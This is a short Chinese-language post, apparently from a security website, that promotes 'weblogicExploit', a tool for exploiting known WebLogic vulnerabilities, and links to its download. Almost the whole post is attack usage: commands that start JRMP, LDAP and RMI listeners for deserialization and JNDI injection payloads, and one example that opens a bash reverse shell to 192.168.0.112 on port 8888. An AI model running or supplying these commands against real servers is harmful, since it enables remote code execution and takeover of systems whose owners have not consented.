weblogic歷史漏洞利用工具 -- weblogicExploit
VSole2022-11-29 10:55:26
一、工具介紹
工具部分代碼借鑒前輩的weblogic_cmd,屬于二次再造輪子,部分功能暫未完善,后續將繼續往上加功能。

二、安裝與使用
1、列出可控payloads
java -jar weblogic.jar -payloads
2、啟動JRMPListener
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
3、啟動LDAP/RMI
LDAP java -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618 RMI java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
4、高版本jndi注入 ldap
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app' java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'
三、下載地址:
https://github.com/8ypass/weblogicExploit
VSole
網絡安全專家